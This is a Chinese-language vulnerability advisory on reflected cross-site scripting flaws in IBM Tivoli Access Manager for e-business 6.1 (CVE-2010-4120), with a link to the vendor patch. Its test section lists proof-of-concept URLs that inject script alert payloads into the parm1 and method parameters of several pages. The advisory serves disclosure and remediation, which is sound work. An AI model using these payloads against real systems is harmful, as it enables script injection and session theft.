安全研究

安全漏洞
IBM Tivoli Access Manager for e-business多个远程跨站脚本漏洞

发布日期:2010-10-22
更新日期:2010-10-26

受影响系统:
IBM Tivoli Access Manager for e-business 6.1
描述:
BUGTRAQ  ID: 44382
CVE ID: CVE-2010-4120

IBM Tivoli Access Manager for e-business是一个基于策略的电子商务访问控制解决方案。

Tivoli Access Manager for e-business没有正确地过滤提交给ivt/ivtserver页面的parm1参数及提交给ibm/wpm/acl、ibm/wpm/domain、ibm/wpm/group、ibm/wpm/gso、ibm/wpm/gsogroup、ibm/wpm/os、ibm/wpm/pop、ibm/wpm/rule、ibm/wpm/user、ibm/wpm/webseal页面的method方式便返回给了用户,这可能导致反射式跨站脚本攻击。

<*来源:IBM (ncsupp@ca.ibm.com
  
  链接:http://secunia.com/advisories/41974/
        http://www-01.ibm.com/support/docview.wss?uid=swg1IZ84918
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/ivt/ivtserver?parm1=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://www.example.com/ibm/wpm/acl?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
http://www.example.com/ibm/wpm/domain?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
http://www.example.com/ibm/wpm/group?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
http://www.example.com/ibm/wpm/gso?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
http://www.example.com/ibm/wpm/gsogroup?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
http://www.example.com/ibm/wpm/os?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
http://www.example.com/ibm/wpm/pop?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
http://www.example.com/ibm/wpm/rule?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
http://www.example.com/ibm/wpm/user?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
http://www.example.com/ibm/wpm/webseal?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

建议:
厂商补丁:

IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www-01.ibm.com/support/docview.wss?uid=swg1IZ84918

浏览次数:2284
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障